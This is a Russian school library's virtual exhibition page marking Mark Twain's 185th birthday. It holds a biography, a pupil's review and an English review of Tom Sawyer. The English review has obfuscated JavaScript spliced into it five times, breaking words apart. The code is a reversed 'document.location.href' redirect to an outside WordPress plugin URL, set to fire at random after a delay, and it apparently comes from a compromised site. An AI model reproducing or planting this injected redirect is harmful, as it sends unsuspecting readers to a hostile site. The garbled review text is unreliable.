logo

МАРК ТВЕН И ЕГО ЗНАМЕНИТЫЕ ГЕРОИ

К 185-летию со дня рождения (1835-1910).

Виртуальная выставка.

30 ноября 1835 года родился знаменитый американский писатель и журналист Марк Твен (настоящее имя Сэмюэл Лэнгхорн Клеменс). Псевдоним mark twain взят писателем из терминов речной навигации. «Приключения Тома Сойера», «Принц и нищий», «Янки из Коннектикута при дворе короля Артура», сборник автобиографических рассказов «Жизнь на Миссисипи» — самые популярные произведения писателя. Лейтмотив его творчества – путешествие. Он оставил в наследие более 25 томов произведений различных жанров. Писатель очень гордился общественным признанием, имел почетную степень доктора нескольких университетов. Дом Марка Твена в Хартфорде превращен в его личный музей и объявлен в США национальным историческим достоянием. За год до смерти он сказал: «Я пришёл в 1835 году с Кометой Галлея, через год она снова прилетает, и я рассчитываю уйти вместе с ней». Так оно и случилось.

Вот некоторые комментарии читателей:
«Марк Твен, живой и острый на язык, любил пошутить: «Вы про меня ничего не знаете, если не читали книжку под названием «Приключения Тома Сойера», но это не беда. Эту книжку написал мистер Марк Твен. Кое-что он присочинил, но не так уж много». Но что же мы знаем об этом человеке? Эрнест Хемингуэй писал, что вся американская литература вышла лишь из одного его произведения, которое называется «Приключения Гекльберри Финна». Твен был не только писателем, он являлся олицетворением образованного и прогрессивно мыслящего человека. Нередко в своих книгах он поднимал проблемы расового неравенства и дискриминации, показывал, что все люди полноценны и равноправны. Но на самом деле потрясает совсем не это, а тот факт, что все эти посылы и подтексты были вплетены в общую картину детского приключенческого произведения, ничем ее не повреждая.
Для меня приключения Финна и Сойера встали в один ряд с несчастным Робинзоном, по своей захватывающей манере повествования, удивительно точным описаниям абсолютно любых вещей. Как мне кажется, знакомство с этим великим гуманистом американской литературы необходимо для каждого человека, а еще лучше было бы познакомиться с Марком Твеном ещё в детстве, ведь что может быть лучше порции «вредных советов» для ребенка?
Подводя итоги, хочу сказать читателям, что годовщина 185-летия писателя — это отличный стимул погрузиться в озорной мир приключений сироток (и не совсем) 19 века. Жду всех Вас на засаленных страницах повестей, покрытых воском и пропахших сыростью…». ( Ричард Гордон, ученик 9 класса)

«The Adventures of Tom Sawyer. The novel about the naughty orphan Tom Sawyer, who lives in the small village called St. Petersburg (not the Russian city St. Petersburg), in Missouri in the U.S.A. in the house of his kind aunt Polly along with his bad-tempered brother Sid and angelic cousin Mary. The book is a collection of stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tories which shows Tom, who was a rebellious boy who doesn’t want toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to listen toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to anyone, change intoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to a responsible person who is admired by many people. I recommend everyone toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to read this exciting and amusing book». (Kevin Grady, Mathematic Teacher)

Прочитать произведения Марка Твена можно по ссылке: http://lib.ru/INPROZ/MARKTWAIN/
Биография писателя: http://mark-twain.ru/
Художественные фильмы по роману М. Твена «Приключения Тома Сойера»:

(Оригинальное название фильма — Tom And Huck) 1995 Disney Enterprises, Inc. All Rights Reserved.
Том Сойер Tom Sawyer 2011 HDRip (на английском языке) https://www.youtube.com/watch?v=RMZYPuKu354

Зав. библиотекой Симбиркина О.В.